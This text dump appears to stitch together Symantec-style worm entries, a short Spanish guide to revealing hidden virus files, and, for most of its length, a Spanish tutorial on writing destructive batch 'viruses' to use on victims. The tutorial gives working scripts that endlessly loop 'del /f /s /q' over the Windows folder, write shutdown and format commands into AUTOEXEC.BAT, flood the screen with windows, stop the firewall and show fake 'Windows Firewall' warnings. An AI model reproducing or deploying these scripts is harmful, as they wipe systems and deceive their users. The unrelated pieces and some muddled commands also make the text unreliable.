You are on page 1of 23

Discovered: December 30, 2008

Updated: March 24, 2009 12:05:35 PM


Also Known As: Worm:W32/Downadup.AL [F-Secure], Win32/Conficker.B [Computer
Associates], W32/Confick-D [Sophos], WORM_DOWNAD.AD [Trend], Net-
Worm.Win32.Kido.ih [Kaspersky], Conficker.D [Panda Software]
Type: Worm
Systems Affected: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT,
Windows Server 2003, Windows Vista, Windows XP
CVE References: CVE-2008-4250
W32.Downadup.B is a worm that spreads by exploiting the Microsoft Windows Server Service
RPC Handling Remote Code Execution Vulnerability (BID 31874). It also attempts to spread to
network shares protected by weak passwords and block access to security-related Web sites.

Note: After reviewing W32.Downadup.B, Symantec recommends reviewing details of


W32.Downadup and W32.Downadup!autorun as well.

Discovered: June 16, 1998


Updated: June 7, 2007 9:58:19 PM
Type: Trojan
Infection Length: varies
Systems Affected: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT,
Windows Server 2003, Windows XP
IRC Trojan is a general detection for Trojan horses that target compromised computers with
Internet Relay Chat (IRC) installed.

Troyan Horse

W32.Downadup!autorun

W32.Gammima.AG

Trojan.Packed.NsAnti

Trojan.Brisv.A

Infostealer.Gampass

Downloader.Trojan

Suspicious.MH690.A
Bueno voy a explicar como quitar un virus sin el antivirus o que
no lo detecte

1 Primero ahí que ver si la PC esta infectada mayormente lo notamos por que esta se pone mas
lenta de costumbre o puede pasar que al abrir una unidad en mi PC abra otra ventana (esto se debe
que ay un virus en la unidad y cada ves que hagamos doble clic se ejecuta todos los virus con
algunas pero pocas excepciones van a la carpeta c:\windows\system32.
Para ver que virus queremos borrar nos podemos fijar en el administrador de tareas que proceso
consumo mas en la PC y ese puede ser nuestro virus o que el antivirus no lo detecte o simplemente
crear un descubridor de virus
O colocamos inicio ejecutar y escribimos

msconfig ejecutamos y te aparéese esta ventana


nos fijamos en la pestaña inicio y vamos te muestra todos los programas que se inician cuando
prendemos la PC vemos si ay alguno que no sea un programa que podría ser el virus y así ya
sabemos cual es el nombre del virus

2 para crear este “descubridor de virus”


Abrimos un bloc de notas y colocamos dentro
ATTRIB –S –H –A
Y lo guardamos como nombre anti.bat el nombre no importa lo que importa es la extensión .bat

3 para borrar el virus ay que iniciar la PC en modo seguro


Vamos a los discos pero entramos con en botón derecho del Mouse abrir para no ejecutar el virus

dentro de la unidad colocamos nuestro descubridor de virus y le asemos doble clic


(recordar que tiene que estar en esa unidad) una ves echo esto aparecerán los virus ocultos va en
realidad los archivos pero estos son virus majr menten tiene nobres raros o del creador como
lechuk gofo etc bórralos
Y así en todas las unidades recuerda que solo en las unidades no lo hagas en carpetas por que
podes borrar archivos importantes
Asemos lo mismo en c:\windows\system32.
Y el virus a parecerá en lo ultimo de la carpeta borrarlo tener cuidado de no borrar los archivos
importante pero de todos modos solo se ve a mostrar el virus para ver cual es coloquen el
descubridor al final de la carpeta y el virus aparecerá al lado borrarlo
Y así reiniciar en modo normal

Bueno esta ves trate de cuidar las faltas de ortografía atentamente electroemilio!
ANTES QUE NADA QUIERO DECIROS QUE CON LAS VARIABLES NO ME LLEVO BIEN
ASI QUE NO EXPLICARE VARIABLES SI POR CASUALIDAD ENCUENTRAN UNA,
MATENMEN xD.

POR CASANOVAMXM
CASANOVAMXM@jotmeil.COM
VISITEN: WWW.PORTALHACK ER.NET LA WEB DE CPH

QUE ES BATCH (EXPLICACION CORTA PERO DETALLADA xD):

BATCH ES UN LENGUAJE DEL CMD, USADO PARA CREAR EJECUTABLES QUE


EJECUTEN PROGRAMAS, ETCETERA, PERO NOSOTROS CREAREMOS VIRUS EN
FORMAT BATCH...

LOS MAS BUENO QUE TIENE EL BATCH, PRIMERO, ES QUE ES FACIL DE APRENDER
Y CONTROLAR, Y NO NECESITAS BAJAR O COMPRAR PROGRAMAS, SOLO
NECESITAS EL BLOCK DE NOTAS (NOTEPAD), Y LA CONSOLA CMD, QUE LA
ENCONTRARAS PONIENDO INICIO . EJECUTAR Y PONIENDO CMD Y APRETANDO
ENTER, LISTO. NUNCA USES WORD O CUALQUIER PROGRAMA DE EDICION DE
TEXTO QUE NO SEA EL NOTEPAD YA QUE SOLO SIRVE ESTE Y SOLO ESTE PARA
CREAR BATCH..

Y LO ULTIMO Y MEJOR, LOS ANTIVIRUS, ETCETERA, NO DETECTAN LOS VIRUS EN


FORMATO BATCH (.BAT) YA QUE SON ALGO VIEJITOS PERO TODABIA SON USADOS
POR MILLONES DE PERSONAS...

SOLO DARE LOS COMANDOS QUE SON USADOS (LOS MAS COMUNES), NO LOS
AVANZADOS, QUE SE USAN PARA CREAR VIRUS Y DEJAR EL SISTEMA FLOTANDO
EN LAS NUBES JAJA...
-----------------------------------------------------------------------------------------------------------------

ESTE TUTORIAL ESTA ECHO PARA LAS PERSONAS QUE LES VIERON LA CARA EN
UN CYBER Y LES COBRARON DE MAS O LES CERRARON LA MAQUINA ANTES DE
TIEMPO... JAJAJA ES UN EJEMPLO xD.

BUENO, ANTES DE EMPEZAR, EXPLICARE ALGO. EN ESTE MANUAL, AL FINAL,


VERAN UN EJEMPLO DE UN VIRUS CON ALGUNOS DE LOS COMANDOS QUE ESTAN
AQUI EN EL MANUAL, LOS COMANDOS COPY Y OTROS PARECIDOS A ESTOS NOS
LOS PONDRE EN EL EJEMPLO DEL VIRUS YA QUE NO SIRVEN MUCHO PORQUE
TENGO OTRAS MANERAS MEJORES JAJAJA ;) .

CAPITULO 1:

COMANDOS:
---------------------

DEL/ERASE: EL COMANDO ERASE O DEL SIRVE PARA BORRAR ARCHIVOS O


DIRECTORIOS.

*.* : ESTE COMANDO VA AL FINAL DEL DEL O ERASE, POR EJEMPLO:  del /f /s /q *.*
DIRECTORIO/ARCHIVO . LO QUE HACE EL COMANDO *.* ES BORRAR LOS
DIRECTORIOS, ARCHIVOS, SUBDIRECTORIOS, ETCETERA, ASI QUE ALGUNOS DE
LOS COMANDOS COMO /F /S NO SERA NECESARIOS, PERO IGUAL PONGANLOS.

SHUTDOWN: EL COMANDOS SHUTDOWN SIRVE PARA REINICIAR/APAGAR LA


MAQUINA.

@ECHO OFF : ESTE COMANDO SIRVE PARA QUE LOS COMANDOS COMO POR
EJEMPLO C: , ETCETERA NO APARESCAN EL CMD.

ECHO: SIRVE PARA DEJAR UN COMENTARIO EL CMD . ESTE SE VE EN EL CMD

REM: IGUAL QUE EL OTRO, SOLO QUE EL COMENTARIO NO SE MUESTRA EN EL


CMD .

CLS: SIRVE PARA BORRAR LA PANTALLA DEL CMD.

EXIT: SIRVE PARA CERRAR EL CMD. MAS BIEN TERMINAR xD.

START: ABRE OTRA VENTANA DE CMD. MAS ADELANTE VERAS COMO SIRVE ESTE
COMANDO CON OTROS MAS PARA JODER A LA VICTIMA Y A LA VES INFECTARLE
LA MAQUINA ;) .

MKDIR/MD: SIRVE PARA CREAR UNA CARPETA EN DONDE VOS QUIERAS.

PAUSE: HACE UNA PAUSA EN DONDE TENDRAS QUE OPRIMIR CUALQUIER TECLA
PARA CONTINUAR. CON EL >NUL , QUE SE MOSTRARA ABAJO, NO TE APARECERA
EL MENSAJITO DE OPRIMIR CUALQUIER TECLA PARA CONTINUAR...

PAUSE >NUL: ES LO MISMO QUE EL PAUSE, SOLO QUE NO APARECERA EL


MENSAJITO MOLESTO DE "PRECIONE CUALQUIER TECLA PARA CONTINUAR"....

CD/CHDIR: SIRVE PARA VIAJAR DE UN DIRECTORIO A OTRO. POR EJEMPLO,


PONEMOS C \ Y NOS "LLEVARA" A C:\ . Y DESDE HAY PONES CD "ARCHIVOS DE
PROGRAMA" . LO QUE HARA SERA LLEVARNOS A ARCHIVOS DE PROGRAMA
DESDE EL C:\ QUE FUIMOS ANTERIORMENTE PONIENDO CD \ .

FORMAT: FORMATEAR UNO O MAS DISCOS, POR EJEMPLO PONES FORMAT A


FORMATEARA EL DISCO A:, SI PONES FORMAT C: FORMATEARA EL DISCO C: PERO
SOLO SI EL WINDOW NO A INICIADO, OSEA, SI EL DISCO ESTA SIENDO USADO NO
SE PODRA FORMATEAR MIENTRAS ESTES EN EL WINDOWS.

GOTO: PARA MI, EL MAS INTERESANTE Y EL MEJOR xD. YA QUE SIRVE, YO LO USO
ASI..., COMO DECIA YA QUE SIRVE (Y YO LO USO ASI).. PARA QUE LA VICTIMA NO
PUEDA HACER NADA MIENTRAS SE LE INFECTA LA MAQUINA MUAJAJA. POR
EJEMPLO PONES :12345 Y PONES ABAJO START Y LUEGO ABAJO DE START PONES
MSG * CAGASTE FUEGO FUISTE INFECTADO POR UN VIRUS Y ABAJO DE ESTO
PONES CD \ Y LUEGO ABAJO DEL /F /S /Q *.* Y SE BORRARA TODO EL DIRECTORIO
C:\ CON SUS SUBDIRECTORIOS, ARCHIVOS, DIRECTORIOS ETCETERA MIENTRAS
QUE EL TIO NO PODRA HACER NADA PARA IMPEDIR QUE SE LE BORRE TODITO xD
Y ABAJO DE ESTE COMANDO GOTO 12345. YA QUE.. MIENTRAS SE LE BORRA TODO
EL C:\ VENTANITAS INFINITAS DE CMD LE SALTARAN EN LA CARA Y MENSAJES
MALIGNOS LE SALTARAN TAMBIEN EN LA CARA DEJANDOLE LA MAQUINA MEDIA
TRABADA SIN OPORTUNIDAD DE CERRAR LA VENTANA QUE ESTA EJECUTANDO
EL VIRUS.

REN/RENAME: MODIFICA EL NOMBRE DE UN ARCHIVO O ARCHIVOS.

MSG * : HACE QUE SALTE UN MENSAJE EN LA CARA DE LA VICTIMA. POR EJEMPLO


MSG * CAGASTE FUEGO. LE APARECERA UNA VENTANITA QUE DIRA CAGASTE
FUEGO xD.

TASKKILL/TSKKILL: SIRVE PARA TERMINAR UN PROCESO QUE ESTE ACTIVO. O


BORRAR UN ARCHIVO ESPECIFICO.

COPY : COPIA ARCHIVOS EN EL LUGAR INDICADO POR VOS.

UNDELETE: SIRVE PARA RECUPERAR LOS ARCHIVOS BORRADOS POR EL


DEL/ERASE . CASI NUNCA FUNCIONA PERO LO PONGO DE TODOS MODOS xD. Y
CREO QUE ESTE COMANDO APARECE EN VERSIONES ANTERIORES DE WINDOWS O
EN CMD ACTUALIZADOS.

RD/RMDIR: BORRA UN DIRECTORIO QUE ESTE VACIO.

DELTREE: BORRA UN DIRECTORIO CON TODO SU CONTENIDO, INCUYENDO


CARPETAS VACIAS xD. NO ES ACONSEJABLE USARLO EN VUESTROS VIRUS
PORQUE MUCHAS DE SUS VICTIMAS TENDRAN EL MS-DOS CMD NORMAL, Y NO
LOS NUEVOS (ACTUALIZADOS). OSEA, LAS NUEVAS VERSIONES DE MS-DOS CMD.

echo off>virus.bat : ESTE ES UN EJEMPLO DE LO QUE HARIA ESTE COMANDO CON


OTROS. CREARIA EN DONDE ESTA EL VIRUS, EL INSTALADOR DEL VIRUS PARA
GENTE CON POCA MENTE xD UN ARCHIVO LLAMADO VIRUS.BAT QUE NO TIENE
NADA DENTRO DE EL, SOLO PARA ASUSTAR A LA VICTIMA, PONIENDO UNOS 20 O
MAS DE ESTOS CON DIFERENTE NOMBRE ASUSTARIAS DE VERDAD A LA VICTIMA
JAJA.

Y LO ULTIMO c:\autoexec.bat . ESTO NO ES UN COMANDO. AQUI SE PONDRAN


ALGUNOS COMANDOS QUE LES EXPLICARE LUEGO.. PARA QUE LA CPU DE LA
VICTIMA SE FORMATEE POR SI SOLA SIN CONFIRMACION DE LA VICTIMA... Y
TAMBIEN.. QUE SE LE APAGUE LA CPU EN CUANTO LA PRENDA JAJAJAJA ;) .

AHORA EMPEZERA CON EXPLICARLES DONDE VAN ALGUNOS DE LOS COMANDOS


QUE EXPLIQUE ANTERIORMENTE, DONDE PONERLOS, ETCETERA:
-----------------------------------------------------------------------------------------------------------------------
----------------------------------------

SHUTDOWN:
----------------------

ABRE EL NOTEPAD (BLOC DE NOTAS) NO EL WORD NI NINGUN EDITOR DE TEXTO,


SIEMPRE EL NOTEPAD (BLOCK DE NOTAS), Y PON ESTO, Y GUARDALO COMO
VIRUS 1.BAT , SIEMPRE XXX.BAT . Y NO LO ABRAS .

@ECHO OFF
SHUTDOWN -S -F -T 10 -C "FUISTE"
EXIT

LO QUE HACE ES APAGARLE LA LA MAQUINA TRAS 10 SEGUNDOS Y MOSTRANDO


UN MENSAJITO DEBAJO DE DONDE DIRA EN 10 SEGUNDOS SE TE APAGARA LA
MAQUINA.

@ECHO OFF: NO MUESTRA LOS COMANDOS COMO C:\ Y LO QUE ESTA PASANDO.

-S : APAGAR MAQUINA .

-F : HACE QUE TODOS LOS PROGRAMAS, ETCETERA QUE ESTEN ABIERTOS,


ETCETERA, SE CIERREN SIN CONFIRMACION DE LA VICTIMA

-T : TIEMPO QUE TRANSCURRIRA PARA APAGARLE LA MAQUINA JAJAJA.

-C "x" : MUESTRA UN MENSAJE DEBAJO DE DONDE DICE SE TE APAGARA LA


MAQUINA EN TAL TIEMPO JAJA. DONDE DICE X ES DONDE VA EL MENSAJE, LOS ""
SON NECESARIOS.

EXIT: CIERRA LA VENTANITA DE CMD TERMINANDO POR COMPLETO EL VIRUS.

Y POR ULTIMO, GUARDALO. PON EN GUARDAR COMO, PONES COMO NOMBRE


VIRUS 1.BAT , SIEMPRE XXX.BAT .
Y RECUERDA, SIEMPRE CREA LOS VIRUS CON EL BLOCK DE NOTAS (NOTEPAD)

OTRO EJEMPLO DE ESTE:

@ECHO OFF
SHUTDOWN -S -F -T 0 >> C:\AUTOEXEC.BAT
EXIT

LO QUE HARIA ESTE SERIA GUARDAR EL VIRUS DE APAGADO DE MAQUINA EN 0


SEGUNDOS EN AUTOEXEC.BAT HACIENDO QUE CADA VES QUE LA VICTIMA
PRENDA SU CPU ESTA SE APAGE AL INSTANTE SIN QUE PUEDA HACER NADA
MUAAJAJA.
@ECHO OFF: NO DEJA QUE LOS COMANDOS SE MUESTREN
SHUTDOWN -S -F -T 0: APAGA LA MAQUINA TRAS 0 SEGUNDOS Y CIERRA LOS
PROGRAMAS ACTIVOS SIN CONFIRMACION DE LA VICTIMA.
>> C:\AUTOEXEC.BAT: ESTO SE USA CON EL SHUTDOWN -S -F -T 0 >>
C:\AUTOEXEC.BAT PARA QUE SE GUARDE EN AUTOEXEC.BAT Y ASI CADA VES
QUE PRENDA LA CPU ESTA SE LE APAGUE AL INSTANTE SI QUE PUEDA HACER
NADA.
EXIT: CIERRA POR COMPLETO LA VENTANA DE MS-DOS (CMD) AL TERMINO DEL
VIRUS.

DEL/ERASE:
-------------------

@ECHO OFF
CD \
CD "WINDOWS"
DEL /F /S /Q *.*
EXIT

LO QUE HACE ESTE VIRUS ES IR PRIMERO A C:\ Y LUEGO A WINDOWS, DESDE HAY
BORRARA TODO EL CONTENIDO DE LA CARPETA WINDOWS, LOS DIRECTORIOS,
SUBDIRECTORIOS, ARCHIVOS, ETCETERA DE TODO TIPO.

@ECHO OFF : OCULTA LOS COMANDOS COMO C:\ .


CD \ : ESTE COMANDO NOS LLEVARA A C:\ .
CD "WINDOWS" : DESPUES DE QUE CD \ NOS LLEVE A C:\ ESTE NOS LLEVARA A LA
CARPETA WINDOWS.
DEL: COMANDO PARA BORRAR ARCHIVOS O CARPETAS DE LA CARPETA
WINDOWS.
/F : FORZARA LA ELIMINACION DE ARCHIVOS CON FORMATO TEXTO. SOLO
LECTURA.
/S : ELIMINA TODOS LOS ARCHIVOS DE LA CARPETA, ETCETERA.
/Q : MODO SILENCIOSO, OSEA, NO PIDE CONFIRMACION DE LA VICTIMA PARA QUE
SE LE BORRE TODO EL DIRECTORIO Y SUB DIRECTORIOS, ARCHIVOS, ETCETERA
DE LA CARPETA WINDOWS.
*.* : BORRA LOS ARCHIVOS DE LOS SUBDIRECTORIOS, ETCETERA, MAS BIEN..
HACE LO MISMO QUE /F /S PERO BORRA MAS COSAS DE LO QUE TENDRIA QUE
BORRAR.
EXIT: CIERRA LA VENTANA CMD TERMINANDO EL PROCESO DEL VIRUS.

REM:
---------

@ECHO OFF
REM BLA BLA BLA BLA BLA BLA BLA
EXIT
ESTO NO ES UN VIRUS, SINO QUE TE EXPLICA DONDE IRIA Y QUE HACE EL
COMANDO REM. LO QUE HARIA SERIA PONER UN COMENTARIO QUE LA VICTIMA
NO LEERA. LO CONTRARIO A ECHO JAJA.

@ECHO OFF: NO DEJA VER LOS COMANDOS.


REM: DEJARA UN COMENTARIO QUE SOLO EL CREADOR DEL VIRUS U OTROS
PODRAN VER SOLO SI ABREN EL .BAT .
EXIT: CERRARA POR COMPLETO LA VENTANA CMD TERMINANDO CON LO QUE SE
ESTABA HACIENDO.

CLS:
-------

@ECHO OFF
ECHO HOLA
ECHO CHAU
ECHO HOLA DE NUEVO JJA
ECHO ANDATE A CAG.....
CLS
EXIT

LO QUE HARIA ESTO SERIA MOSTRAR EN LA VENTANA MS-DOS HOLA, CHAU,


HOLA DE NUEVO JJA, ANDATE A CAG.... Y LUEGO CLS BORRARA LOS
COMENTARIOS QUE ANTERIORMENTE LES DIJE.

@ECHO OFF: NO DEJA VER LOS COMANDOS


ECHO XXX : MOSTRARA UN COMENTARIO, UN MENSAJE, QUE LA VICTIMA SI
PODRA LEER. DONDE DICE XXX ES DONDE IRIA EL MENSAJE.
CLS: EL COMANDO QUE EXPLICAMOS EN ESTA PARTE DEL MANUAL DE BATCH,
BORRA TODOS LOS COMANDOS, COMENTARIOS, MENSAJES, QUE SE ISIERON.
EXIT: CIERRA LA VENTANA CMD.

START:
-----------

@ECHO OFF
START
EXIT

ABRIRIA OTRA VENTANA CMD (MS-DOS) . USADA CON GOTO SE ABRIRIAN


MILLONES DE VENTANAS DE CMD (MS- DOS)

@ECHO OFF: NO DEJA VER LOS COMANDOS


START: ABRE UNA NUEVA VENTANA DE MS- DOS (CMD)
EXIT: CIERRA LA VENTANA CMD .
MD/MKDIR:
----------------------

@ECHO OFF
CD \
MD CARPETA NUEVA
EXIT

LO QUE HARIA ESTO SERIA CREAR UNA CARPETA EN EL DIRECTORIO C:\ . CON EL
COMANDO GOTO CREARIA MILLONES DE CARPETAS JAJA.

@ECHO OFF: NO DEJA VER LOS COMANDOS


CD \ : NOS LLEVA A C:\
MD XXX : CREA UNA CARPETA EN EL DIRECTORIO EN DONDE NOS LLEVO CD \ ,
OSEA EN C:\ . EN DONDE DICE XXX VA EL NOMBRE DE LA CARPETA
EXIT: CIERRA LA VENTANA CMD

PAUSE/PAUSE >NUL:
-------------------------------------

@ECHO OFF
ECHO HOLA
PAUSE
CLS
ECHO HOLA DE NUEVO JJA
PAUSE >NUL
CLS
EXIT

LO QUE HARIA ESTO, SERIA CREAR PRIMERO UN COMENTARIO QUE LA VICTIMA


VERA, Y CON EL PAUSE LE MOSTRARA UN MENSAJE QUE LE DIRA QUE APRETE
CUALQUIER TECLA PARA CONTINUAR. LUEGO CON EL CLS BORRA EL MENSAJE Y
LE PONE OTRO, QUE SERA HOLA DE NUEVO JJA, Y NO LE DIRA QUE APRETE
CUALQUIER TECLA PARA CONTINUAR, YA QUE EL >NUL BORRARA EL MENSAJE
DE APRETE UN BOTON PARA CONTINUAR . Y DESPUES EL CLS BORRARA EL
MENSAJE.

@ECHO OFF: NO DEJA VER LOS COMANDOS


ECHO: DEJA UN COMENTARIO QUE LA VICTIMA SI PODRA VER
PAUSE: LE DIRA A LA VICTIMA QUE OPRIMA CUALQUIER TECLA PARA
CONTINUAR.
CLS: BORRA EL COMENTARIO O COMANDOS QUE ANTERIORMENTE SE
MOSTRABAN EN LA VENTANA DEL CMD Y QUE LA VICTIMA VEIA.
PAUSE >NUL: LO MISMO QUE PAUSE SOLO QUE NO MUESTRA EL MENSAJE DE
APRETE CUALQUIER TECLA PARA CONTINUAR.
EXIT: SE CIERRA LA VENTANA MSDOS (CMD)
FORMAT:
---------------

@ECHO OFF
FORMAT C: -S -F -T 0 >> C:\AUTOEXEC.BAT
SHUTDOWN -S -F -T 1 -C "FUISTE"
EXIT

LO QUE HARA SERA APAGARLE LA MAQUINA EN UN SEGUNDO Y EN CUANTO LA


PRENDA SE LE FORMATEARA LA MAQUINA SIN QUE LA VICTIMA ACEPTE LA
CONFIRMACION QUE TENDRIA QUE ACEPTAR.
@ECHO OFF: NO DEJA VER LOS COMANDOS
FORMAT C: -S -F -T 0 >> C:\AUTOEXEC.BAT : LE FORMATEA LA MAQUINA SIN
CONFIRMACION DE LA VICTIMA EN 0 SEGUNDOS Y SE GUARDARA EN
AUTOEXEC.BAT PARA QUE CUANDO LA PRENDA SE LE FORMATEARA SIN PEDIR
CONFIRMACION DE LA VICTIMA
SHUTDOWN -S -F -T 1 -C "FUISTE": LE APAGARA LA MAQUINA SIN PEDIR
CONFIRMACION DE LA VICTIMA PARA QUE SE LE CIERREN TODOS LOS
PROGRAMAS QUE ESTAN SIENDO EJECUTADOS Y MOSTRARA UN MENSAJE
"FUISTE" .
EXIT: CERRARA LA VENTANA CMD.

GOTO (MI FAVORITO):


---------------------------------------
@ECHO OFF
:1
START
CD \
CD "WINDOWS"
del /f /s /q *.*
GOTO 1

LO QUE HACE ESTE VIRUS ES PRIMERO, ACTIVARSE EL GOTO, HACIENDO QUE LOS
COMANDOS MALICIOSOS QUE ESTEN DENTRO DEL GOTO SE REPITAN INFINITAS
VECES, LUEGO CD \ NOS LLEVARA A C:\ Y CD "WINDOWS" NOS LLEVARA A
WINDOWS, LUEGO DEL /F /S /Q *.* BORRARA TODA LA CARPETA WINDOWS,
INCLUYENDO SOLO LECTURA, ARCHIVOS, SUBDIRECTORIOS, DIRECTORIOS,
ETCETERA.

@ECHO OFF: NO DEJA QUE SE MUESTREN LOS COMANDOS


:1 : ES EL COMANDO QUE SIRVE PARA QUE GOTO FUNCIONE, OSEA PONIENDO :1 Y
ABAJO UN COMANDO, POR EJEMPLO START, Y ABAJO DE START GOTO 1 , LO QUE
HARA SERA PRIMERO ACTIVARSE LA REPETICION INFINITA Y SE LE ABRIRAN A LA
VICTIMA MILLONES E INFINITAS VENTANAS DE MS-DOS (CMD).
START: ABRE UNA VENTANA DE MS-DOS PERO CON EL COMANDO :1 Y GOTO SE
REPETIRAN INFINITAS VECES MOLESTANDO DE VERDAD LA VICTIMA.
CD \ : NOS LLEVARA A C:\
CD "WINDOWS" : EN CUANTO LLEGEMOS A C:\ CON EL COMANDO ANTERIOR CD \
ESTE NOS LLEVARA A LA CARPETA WINDOWS.
DEL /F /S /Q *.* : BORRARA LOS ARCHIVOS DE SOLO LECTURA, ARCHIVOS,
DIRECTORIOS, SUBDIRECTORIOS DE LA CARPETA WINDOWS.
GOTO 1 : NOS LLEVARA NUEVAMENTE A :1 HACIENDO QUE SE REPITAN
NUEVAMENTE LOS COMANDOS QUE ESTAN DENTRO DEL GOTO. CON EL DEL /F
/S /Q *.* ES AL PEDO YA QUE CUANDO TERMINE DE BORRAR LA CARPETA
WINDOWS NO TENDRA QUE BORRAR, PERO ES BUENO PARA QUE LA PU&%
VICTIMA NO PUEDA CERRAR LA VENTANA EN DONDE ESTA EL VIRUS JAJAJA.

REN/RENAME:
-----------------------------

@ECHO OFF
CD \
RENAME EJEMPLO.TXT EJEMPLOXXXXXXX X.TXT
EXIT

LO QUE HACE ES PRIMERO IR A C:\ CON CD \ Y RENOMBRAR EL ARCHIVO


EJEMPLO.TXT QUE NO EXISTE, LO TIENES QUE CREAR VOS O ENCONTRAR ALGUN
ARCHIVO QUE QUIERAS RENOMBRAR, Y LUEGO EL ARCHIVO EJEMPLO.TXT SE
CONVIERTE EN EJEMPLOXXXXXXX X.TXT . EL ARCHIVO NO CAMBIA, SU
CONTENIDO TAMPOCO, SOLO EL NOMBRE.

@ECHO OFF: NO DEJA QUE SE MUESTREN LOS COMANDOS.


CD \ : NOS LLEVARA A C:\
RENAME EJEMPLO. TXT EJEMPLOXXXXXXX XX.TXT : RENOMBRARA A
EJEMPLOXXXXXXX X.TXT EL EJEMPLO.TXT . OVIAMENTE ESTE ARCHIVO NO
EXISTE, BUSCA EL ARCHIVO QUE QUIERAS RENOMBRAR. ES UN EJEMPLO.
EXIT: CERRARA LA VENTANA DE MS-DOS (CMD)

MSG *:
------------

@ECHO OFF
MSG * HOLA HOMBRE. ¿APRENDIENDO BATCH MALIGNOS?
EXIT

LO QUE HARA SERA MOSTRARLE UN MENSAJE QUE APARECERA EN UNA


VENTANITA CHIQUITITA HOLA HOMBRE ¿APRENDIENDO BATCH MALIGNOS? ....

@ECHO OFF: NO DEJA QUE SE MUESTREN LOS COMANDOS


MSG * XXX: MUESTRA UN MENSAJE QUE LE APARECERA A LA VICTIMA, EN DONDE
DICE XXX ES DONDE VA EL MENSAJE.
EXIT: CERRARA LA VENTANA DE MS-DOS (CMD).

COPY:
-----------

@ECHO OFF
CD \
CD "WINDOWS"
COPY NOTEPAD.EXE C:\
EXIT

LO QUE HACE ESTO ES COPIAR EL NOTEPAD.EXE A C:\ . PRIMERO EL COMANDO


CD \ NOS LLEVARA A C:\ Y LUEGO CD "WINDOWS" NOS LLEVARA A LA CARPETA
WINDOWS Y LUEGO xD EL COMANDO COPY COPIARA EL NOTEPAD DE WINDOWS A
C:\ .

@ECHO OFF: NO DEJA VER LOS COMANDOS


CD \ : NOS LLEVARA A C:\
CD "WINDOWS": LUEGO DE QUE CD \ NO LLEVA A C:\ CD "WINDOWS" NO LLEVARA
A LA CARPETA WINDOWS.
COPY NOTEPAD.EXE C:\ : COPY COPIARA EL ARCHIVO NOTEPAD.EXE A C:\ .
EXIT: CIERRA LA VENTANA DE MS-DOS (CMD)

RD/RMDIR:
-------------------

POR EJEMPLO, LA CARPETA QUE VERAN AHORA ESTARIA VACIA, PERO NO EXISTE
EN SU CPU, ES UN EJEMPLO NADA + DE LO QUE HARIA ESTE COMANDO:

@ECHO OFF
CD \
RD CARPETA VACIA
EXIT

LO QUE HARIA SERA LLEVARNOS A C:\ CON EL COMANDO C \ Y CON EL COMANDO


RD BORRAR LA CARPETA "CARPETA VACIA" QUE ENVERDAD NO EXISTE EN SU
COMPUTADORA, ES UN EJEMPLO. SOLO LA BORRARA SI ESTA VACIA, CREO,
NUNCA PROBE ESTE COMANDO CON UNA CARPETA LLENA DE ARCHIVOS JAJA
EXPERIMENTEN, PERO NO HAGAN ESTUPIDESES.

@ECHO OFF: NO DEJA VER LOS COMANDOS


CD \ : NOS LLEVARA A C:\
RD CARPETA VACIA : LUEGO DE QUE CD \ NO LLEVARA A C:\ RD BORRARA LA
CARPETA VACIA QUE ENVERDAD NO EXISTE Y QUE ES UN EJEMPLO NADA MAS .
EXIT: CERRARA LA VENTANA DE MS-DOS (CMD)

DELTREE (SOLO PARA VERSIONES ACTUALIZADAS O NUEVAS DE MS-DOS (CMD):


-----------------------------------------------------------------------------------------------------------------------
---------------

@ECHO OFF
CD \
DELTREE WINDOWS
EXIT

PRIMERO, NO SE SI ESTA BIEN, YA QUE DELTREE NUNCA LO HE USADO PORQUE


MUCHAS DE MIS VICTIMAS TIENEN LA VERSION NORMAL QUE BIENE CON EL
WINDOWS DE MS-DOS (CMD). LO QUE HACE ES BORRAR TODO PERO TODO DE LA
CARPETA WINDOWS, CREO QUE ALGO ISE MAL EN ESTO PERO NO IMPORTA CREO
QUE ES ASI.

@ECHO OFF: NO DEJA QUE SE MUESTREN LOS COMANDOS


CD \ : NOS LLEVARA A C:\
DELTREE WINDOWS : LUEGO DE QUE CD \ NOS LLEVARA A C:\ DELTREE BORRARA
LA CARPETA, TODO LO QUE TENGA LA CARPETA DE WINDOWS.
EXIT: CIERRA LA VENTADA DE MS-DOS (CMD)

VIRUS CON ALGUNOS DE LOS COMANDOS QUE VIMOS EN ESTE MANUAL DE VIRUS
EN BATCH, ALGUNOS NO ESTAN EN EL MANUAL, EN CUANTO TENGA TIEMPO
ACTUALIZO EL MANUAL Y LOS PONGO, PERO SEGURO QUE SE ENTIENDEN,

1ºER PASO:

ABRAN EL BLOC DE NOTAS Y PONGAN ESTO:

@echo off
color a
title MS-DOS
cls
cd \
start auttoexec.bat
start & msg * FIREWALL DE WINDOWS A DETECTADO UN VIRUS.. & MSG *
PORFAVOR.. ESPERE A QUE FIREWALL DE WINDOWS REPARE Y & MSG * .. ELIMINE
POR COMPLETO EL VIRUS & MSG * .. ESTO PUEDE TARDAR VARIOS MINUTOS..
VERA ANOMALIAS EN SU PANTALLA.. & MSG * .. LAS ANOMALIAS NO DAÑARAN
SU CPU, PERO EL VIRUS SI.. & MSG * .. DEJE QUE FIREWALL COMBATA AL VIRUS ..
& MSG * SI USTED APAGA/REINICIA LA MAQUINA AHORA.. EL VIRUS QUEDARA.. &
MSG * .. QUEDARA EN SU SISTEMA OPERATIVO DEJANDOLO INSERVIBLE.. & MSG
* .. FIREWALL REPARARA LOS ARCHIVOS DAÑADOS POR EL VIRUS .. & MSG * ESTO
PUEDE TARDAR VARIOS MINUTOS.. PORFAVOR ESPERE Y SEA PACIENTE.. & MSG *
MENSAJE DE MICROSOFT WINDOWS XP. REPETICION DE MSG
:repeticion
start
MSG * FIREWALL ESTA COMBATIENDO EL VIRUS.. NO APAGUE SU CPU O EL VIRUS
INCUBARA EN SU CPU QUEDANDO DENTRO.....
goto repeticion

AHORA GUARDENLO COMO SETUP.BAT Y PONGANLO EN C:\ . POR TODO LO QUIE


QUIERAN EN EL MUNDO NO LO ABRAN POR AHORA.

2ºDO PASO:
AHORA ABRAN OTRO BLOC DE NOTAS Y PONGAN ESTO:

@echo off
color a
title c:\WINDOWS\system32\cmd.exe
cls
rem VIRUS CREADO POR CASANOVAMXM . VISITEN WWW.PORTALHACK ER.NET LA
WEB DE LOS CPH .
cls
net stop "Firewall de Windows/Conexi¢n compartida a Internet (ICS)"
cls
cd \
cls
echo off>virus.bat
cls
echo off>virus69.bat
cls
echo off>virus58.bat
cls
echo off>virus45.bat
cls
echo off>virus54.bat
cls
